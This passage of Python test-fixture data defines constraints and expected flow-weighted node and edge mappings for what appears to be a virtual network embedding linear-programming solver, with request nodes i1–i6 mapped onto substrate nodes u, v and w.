{"i4", "i5", "i6"}, "i2": {"i4", "i6"}, "i3": {"i5", "i6"}, "i4": {"i4"}, "i5": {"i5"}, "i6": {"i6"}, }, "bags": { "i1": {frozenset(["i4", "i5", "i6"]): {("i1", "i2"), ("i1", "i3"), ("i1", "i4"), ("i1", "i5"), ("i1", "i6")}}, "i2": {frozenset(["i4"]): {("i2", "i4")}, frozenset(["i6"]): {("i2", "i6")}}, "i3": {frozenset(["i5"]): {("i3", "i5")}, frozenset(["i6"]): {("i3", "i6")}}, "i4": {frozenset(): set()}, "i5": {frozenset(): set()}, "i6": {frozenset(): set()}, }, "assumed_root": "i1", "ignore_bfs": True, "assumed_allowed_nodes": { "i1": ["u"], "i2": ["v"], "i3": ["u"], "i4": ["v", "w"], "i5": ["u", "v"], "i6": ["u", "w"], }, "constraints": { "node_mapping": { ("node_mapping_aggregation_req[{req_name}]_vnode[i1]_snode[u]_bag[i4_i5_i6]", ( (-1.0, "node_agg_var", ("i1", "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i2]_snode[v]_bag[i4]", ( (-1.0, "node_agg_var", ("i2", "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i2]_snode[v]_bag[i6]", ( (-1.0, "node_agg_var", ("i2", "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i6", "w")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i3]_snode[u]_bag[i5]", ( (-1.0, "node_agg_var", ("i3", "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i5", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i5", "v")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i3]_snode[u]_bag[i6]", ( (-1.0, "node_agg_var", ("i3", "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i6", "w")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[v]_bag[]", ( (-1.0, "node_agg_var", ("i4", "v")), (1.0, "node_mapping_var", ("i4", frozenset(), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[w]_bag[]", ( (-1.0, "node_agg_var", ("i4", "w")), (1.0, "node_mapping_var", ("i4", frozenset(), "w")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i5]_snode[u]_bag[]", ( (-1.0, "node_agg_var", ("i5", "u")), (1.0, "node_mapping_var", ("i5", frozenset(), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i5]_snode[v]_bag[]", ( (-1.0, "node_agg_var", ("i5", "v")), (1.0, "node_mapping_var", ("i5", frozenset(), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i6]_snode[u]_bag[]", ( (-1.0, "node_agg_var", ("i6", "u")), (1.0, "node_mapping_var", ("i6", frozenset(), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i6]_snode[w]_bag[]", ( (-1.0, "node_agg_var", ("i6", "w")), (1.0, "node_mapping_var", ("i6", frozenset(), "w")), )), # i1, u, i1 -> i2 ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_v__i6_u]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_v__i6_w]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_w__i6_u]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i4_w__i6_w]", ( (-1.0, "source_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), # i1, u, i1 -> i3 ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i5_u__i6_u]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i5_u__i6_w]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i5_v__i6_u]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i5_v__i6_w]", ( (-1.0, "source_var", (('i1', 'i3'), frozenset([("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), # i1, u, i1 -> i4 ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i4')]_comm_index[i4_v]", ( (-1.0, "source_var", (('i1', 'i4'), frozenset([("i4", "v")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i4')]_comm_index[i4_w]", ( (-1.0, "source_var", (('i1', 'i4'), frozenset([("i4", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), # i1, u, i1 -> i5 ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i5')]_comm_index[i5_u]", ( (-1.0, "source_var", (('i1', 'i5'), frozenset([("i5", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i5')]_comm_index[i5_v]", ( (-1.0, "source_var", (('i1', 'i5'), frozenset([("i5", "v")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), # i1, u, i1 -> i6 ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i6')]_comm_index[i6_u]", ( (-1.0, "source_var", (('i1', 'i6'), frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i6')]_comm_index[i6_w]", ( (-1.0, "source_var", (('i1', 'i6'), frozenset([("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "v"), ("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "w")]), "u")), )), # i2, v, i1 -> i2 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_v]_bag[i4]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i6", "u")]), "v")), (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i4_w]_bag[i4]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i6", "u")]), "v")), (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i6_u]_bag[i6]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i6", "u")]), "v")), (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i6", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i6_w]_bag[i6]", ( (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "v"), ("i6", "w")]), "v")), (-1.0, "sink_var", (('i1', 'i2'), frozenset([("i4", "w"), ("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i6", "w")]), "v")), )), # i2, v, i2 -> i4 ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i4')]_comm_index[i4_v]", ( (-1.0, "source_var", (('i2', 'i4'), frozenset([("i4", "v")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i4')]_comm_index[i4_w]", ( (-1.0, "source_var", (('i2', 'i4'), frozenset([("i4", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "w")]), "v")), )), # i2, v, i2 -> i6 ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i6')]_comm_index[i6_u]", ( (-1.0, "source_var", (('i2', 'i6'), frozenset([("i6", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i6", "u")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i6')]_comm_index[i6_w]", ( (-1.0, "source_var", (('i2', 'i6'), frozenset([("i6", "w")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i6", "w")]), "v")), )), # i3, u, i1 -> i3 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i5_u]_bag[i5]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i5", "u"), ("i6", "u")]), "u")), (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i5", "u"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i5", "u")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i5_v]_bag[i5]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i5", "v"), ("i6", "u")]), "u")), (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i5", "v")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i6_u]_bag[i6]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i5", "u"), ("i6", "u")]), "u")), (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i5", "v"), ("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i6", "u")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[i6_w]_bag[i6]", ( (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i5", "u"), ("i6", "w")]), "u")), (-1.0, "sink_var", (('i1', 'i3'), frozenset([("i5", "v"), ("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i6", "w")]), "u")), )), # i3, u, i3 -> i5 ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i5')]_comm_index[i5_u]", ( (-1.0, "source_var", (('i3', 'i5'), frozenset([("i5", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i5", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i5')]_comm_index[i5_v]", ( (-1.0, "source_var", (('i3', 'i5'), frozenset([("i5", "v")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i5", "v")]), "u")), )), # i3, u, i3 -> i6 ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i6')]_comm_index[i6_u]", ( (-1.0, "source_var", (('i3', 'i6'), frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i6", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i6')]_comm_index[i6_w]", ( (-1.0, "source_var", (('i3', 'i6'), frozenset([("i6", "w")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i6", "w")]), "u")), )), # i4, v, i1 -> i4 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[v]_vedge[('i1','i4')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i1', 'i4'), frozenset([("i4", "v")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset(), "v")), )), # i4, w, i1 -> i4 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[w]_vedge[('i1','i4')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i1', 'i4'), frozenset([("i4", "w")]), "w")), (1.0, "node_mapping_var", ("i4", frozenset(), "w")), )), # i4, v, i2 -> i4 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[v]_vedge[('i2','i4')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i2', 'i4'), frozenset([("i4", "v")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset(), "v")), )), # i4, w, i2 -> i4 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[w]_vedge[('i2','i4')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i2', 'i4'), frozenset([("i4", "w")]), "w")), (1.0, "node_mapping_var", ("i4", frozenset(), "w")), )), # i5, u, i1 -> i5 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[u]_vedge[('i1','i5')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i1', 'i5'), frozenset([("i5", "u")]), "u")), (1.0, "node_mapping_var", ("i5", frozenset(), "u")), )), # i5, v, i1 -> i5 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[v]_vedge[('i1','i5')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i1', 'i5'), frozenset([("i5", "v")]), "v")), (1.0, "node_mapping_var", ("i5", frozenset(), "v")), )), # i5, u, i3 -> i5 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[u]_vedge[('i3','i5')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i3', 'i5'), frozenset([("i5", "u")]), "u")), (1.0, "node_mapping_var", ("i5", frozenset(), "u")), )), # i5, v, i3 -> i5 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i5]_snode[v]_vedge[('i3','i5')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i3', 'i5'), frozenset([("i5", "v")]), "v")), (1.0, "node_mapping_var", ("i5", frozenset(), "v")), )), # i6, u, i1 -> i6 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[u]_vedge[('i1','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i1', 'i6'), frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i6", frozenset(), "u")), )), # i6, w, i1 -> i6 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[w]_vedge[('i1','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i1', 'i6'), frozenset([("i6", "w")]), "w")), (1.0, "node_mapping_var", ("i6", frozenset(), "w")), )), # i6, u, i2 -> i6 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[u]_vedge[('i2','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i2', 'i6'), frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i6", frozenset(), "u")), )), # i6, w, i2 -> i6 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[w]_vedge[('i2','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i2', 'i6'), frozenset([("i6", "w")]), "w")), (1.0, "node_mapping_var", ("i6", frozenset(), "w")), )), # i6, u, i3 -> i6 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[u]_vedge[('i3','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i3', 'i6'), frozenset([("i6", "u")]), "u")), (1.0, "node_mapping_var", ("i6", frozenset(), "u")), )), # i6, w, i3 -> i6 ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i6]_snode[w]_vedge[('i3','i6')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (('i3', 'i6'), frozenset([("i6", "w")]), "w")), (1.0, "node_mapping_var", ("i6", frozenset(), "w")), )), } }, "mappings": [ { "flow": 0.375, "expected": { "nodes": { "i1": "u", "i2": "v", "i3": "u", "i4": "v", "i5": "u", "i6": "w", }, "edges": { ("i1", "i2"): [("u", "v")], ("i1", "i3"): [], ("i1", "i4"): [("u", "w"), ("w", "v")], ("i1", "i5"): [], ("i1", "i6"): [("u", "w")], ("i2", "i4"): [], ("i2", "i6"): [("v", "w")], ("i3", "i5"): [], ("i3", "i6"): [("u", "w")], }, }, "variables": { ("node_mapping_var", "i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u"), ("node_mapping_var", "i2", frozenset([("i4", "v")]), "v"), ("node_mapping_var", "i2", frozenset([("i6", "w")]), "v"), ("node_mapping_var", "i3", frozenset([("i5", "u")]), "u"), ("node_mapping_var", "i3", frozenset([("i6", "w")]), "u"), ("node_mapping_var", "i4", frozenset(), "v"), ("node_mapping_var", "i5", frozenset(), "u"), ("node_mapping_var", "i6", frozenset(), "w"), ("source_var", ("i1", "i2"), frozenset([("i4", "v"), ("i6", "w")]), "u"), ("edge_var", ("i1", "i2"), frozenset([("i4", "v"), ("i6", "w")]), ("u", "v")), ("sink_var", ("i1", "i2"), frozenset([("i4", "v"), ("i6", "w")]), "v"), ("source_var", ("i1", "i3"), frozenset([("i5", "u"), ("i6", "w")]), "u"), ("sink_var", ("i1", "i3"), frozenset([("i5", "u"), ("i6", "w")]), "u"), ("source_var", ("i1", "i4"), frozenset([("i4", "v")]), "u"), ("edge_var", ("i1", "i4"), frozenset([("i4", "v")]), ("u", "w")), ("edge_var", ("i1", "i4"), frozenset([("i4", "v")]), ("w", "v")), ("sink_var", ("i1", "i4"), frozenset([("i4", "v")]), "v"), ("source_var", ("i1", "i5"), frozenset([("i5", "u")]), "u"), ("sink_var", ("i1", "i5"), frozenset([("i5", "u")]), "u"), ("source_var", ("i1", "i6"), frozenset([("i6", "w")]), "u"), ("edge_var", ("i1", "i6"), frozenset([("i6", "w")]), ("u", "w")), ("sink_var", ("i1", "i6"), frozenset([("i6", "w")]), "w"), ("source_var", ("i2", "i4"), frozenset([("i4", "v")]), "v"), ("sink_var", ("i2", "i4"), frozenset([("i4", "v")]), "v"), ("source_var", ("i2", "i6"), frozenset([("i6", "w")]), "v"), ("edge_var", ("i2", "i6"), frozenset([("i6", "w")]), ("v", "w")), ("sink_var", ("i2", "i6"), frozenset([("i6", "w")]), "w"), ("source_var", ("i3", "i5"), frozenset([("i5", "u")]), "u"), ("sink_var", ("i3", "i5"), frozenset([("i5", "u")]), "u"), ("source_var", ("i3", "i6"), frozenset([("i6", "w")]), "u"), ("edge_var", ("i3", "i6"), frozenset([("i6", "w")]), ("u", "w")), ("sink_var", ("i3", "i6"), frozenset([("i6", "w")]), "w"), } }, { "flow": 0.0625, "expected": { "nodes": { "i1": "u", "i2": "v", "i3": "u", "i4": "v", "i5": "u", "i6": "w", }, "edges": { ("i1", "i2"): [("u", "v")], ("i1", "i3"): [], ("i1", "i4"): [("u", "w"), ("w", "v")], ("i1", "i5"): [], ("i1", "i6"): [("u", "v"), ("v", "w")], ("i2", "i4"): [], ("i2", "i6"): [("v", "w")], ("i3", "i5"): [], ("i3", "i6"): [("u", "w")], }, }, "variables": { ("node_mapping_var", "i1", frozenset([("i4", "v"), ("i5", "u"), ("i6", "w")]), "u"), ("node_mapping_var", "i2", frozenset([("i4", "v")]), "v"), ("node_mapping_var", "i2", frozenset([("i6", "w")]), "v"), ("node_mapping_var", "i3", frozenset([("i5", "u")]), "u"), ("node_mapping_var", "i3", frozenset([("i6", "w")]), "u"), ("node_mapping_var", "i4", frozenset(), "v"), ("node_mapping_var", "i5", frozenset(), "u"), ("node_mapping_var", "i6", frozenset(), "w"), ("source_var", ("i1", "i2"), frozenset([("i4", "v"), ("i6", "w")]), "u"), ("edge_var", ("i1", "i2"), frozenset([("i4", "v"), ("i6", "w")]), ("u", "v")), ("sink_var", ("i1", "i2"), frozenset([("i4", "v"), ("i6", "w")]), "v"), ("source_var", ("i1", "i3"), frozenset([("i5", "u"), ("i6", "w")]), "u"), ("sink_var", ("i1", "i3"), frozenset([("i5", "u"), ("i6", "w")]), "u"), ("source_var", ("i1", "i4"), frozenset([("i4", "v")]), "u"), ("edge_var", ("i1", "i4"), frozenset([("i4", "v")]), ("u", "w")), ("edge_var", ("i1", "i4"), frozenset([("i4", "v")]), ("w", "v")), ("sink_var", ("i1", "i4"), frozenset([("i4", "v")]), "v"), ("source_var", ("i1", "i5"), frozenset([("i5", "u")]), "u"), ("sink_var", ("i1", "i5"), frozenset([("i5", "u")]), "u"), ("source_var", ("i1", "i6"), frozenset([("i6", "w")]), "u"), ("edge_var", ("i1", "i6"), frozenset([("i6", "w")]), ("u", "v")), ("edge_var", ("i1", "i6"), frozenset([("i6", "w")]), ("v", "w")), ("sink_var", ("i1", "i6"), frozenset([("i6", "w")]), "w"), ("source_var", ("i2", "i4"), frozenset([("i4", "v")]), "v"), ("sink_var", ("i2", "i4"), frozenset([("i4", "v")]), "v"), ("source_var", ("i2", "i6"), frozenset([("i6", "w")]), "v"), ("edge_var", ("i2", "i6"), frozenset([("i6", "w")]), ("v", "w")), ("sink_var", ("i2", "i6"), frozenset([("i6", "w")]), "w"), ("source_var", ("i3", "i5"), frozenset([("i5", "u")]), "u"), ("sink_var", ("i3", "i5"), frozenset([("i5", "u")]), "u"), ("source_var", ("i3", "i6"), frozenset([("i6", "w")]), "u"), ("edge_var", ("i3", "i6"), frozenset([("i6", "w")]), ("u", "w")), ("sink_var", ("i3", "i6"), frozenset([("i6", "w")]), "w"), } }, { "flow": 0.125, "expected": { "nodes": { "i1": "u", "i2": "v", "i3": "u", "i4": "w", "i5": "v", "i6": "u", }, "edges": { ("i1", "i2"): [("u", "v")], ("i1", "i3"): [], ("i1", "i4"): [("u", "w")], ("i1", "i5"): [("u", "v")], ("i1", "i6"): [], ("i2", "i4"): [("v", "w")], ("i2", "i6"): [("v", "u")], ("i3", "i5"): [("u", "v")], ("i3", "i6"): [], }, }, "variables": { ("node_mapping_var", "i1", frozenset([("i4", "w"), ("i5", "v"), ("i6", "u")]), "u"), ("node_mapping_var", "i2", frozenset([("i4", "w")]), "v"), ("node_mapping_var", "i2", frozenset([("i6", "u")]), "v"), ("node_mapping_var", "i3", frozenset([("i5", "v")]), "u"), ("node_mapping_var", "i3", frozenset([("i6", "u")]), "u"), ("node_mapping_var", "i4", frozenset(), "w"), ("node_mapping_var", "i5", frozenset(), "v"), ("node_mapping_var", "i6", frozenset(), "u"), ("source_var", ("i1", "i2"), frozenset([("i4", "w"), ("i6", "u")]), "u"), ("edge_var", ("i1", "i2"), frozenset([("i4", "w"), ("i6", "u")]), ("u", "v")), ("sink_var", ("i1", "i2"), frozenset([("i4", "w"), ("i6", "u")]), "v"), ("source_var", ("i1", "i3"), frozenset([("i5", "v"), ("i6", "u")]), "u"), ("sink_var", ("i1", "i3"), frozenset([("i5", "v"), ("i6", "u")]), "u"), ("source_var", ("i1", "i4"), frozenset([("i4", "w")]), "u"), ("edge_var", ("i1", "i4"), frozenset([("i4", "w")]), ("u", "w")), ("sink_var", ("i1", "i4"), frozenset([("i4", "w")]), "w"), ("source_var", ("i1", "i5"), frozenset([("i5", "v")]), "u"), ("edge_var", ("i1", "i5"), frozenset([("i5", "v")]), ("u", "v")), ("sink_var", ("i1", "i5"), frozenset([("i5", "v")]), "v"), ("source_var", ("i1", "i6"), frozenset([("i6", "u")]), "u"), ("sink_var", ("i1", "i6"), frozenset([("i6", "u")]), "u"), ("source_var", ("i2", "i4"), frozenset([("i4", "w")]), "v"), ("edge_var", ("i2", "i4"), frozenset([("i4", "w")]), ("v", "w")), ("sink_var", ("i2", "i4"), frozenset([("i4", "w")]), "w"), ("source_var", ("i2", "i6"), frozenset([("i6", "u")]), "v"), ("edge_var", ("i2", "i6"), frozenset([("i6", "u")]), ("v", "u")), ("sink_var", ("i2", "i6"), frozenset([("i6", "u")]), "u"), ("source_var", ("i3", "i5"), frozenset([("i5", "v")]), "u"), ("edge_var", ("i3", "i5"), frozenset([("i5", "v")]), ("u", "v")), ("sink_var", ("i3", "i5"), 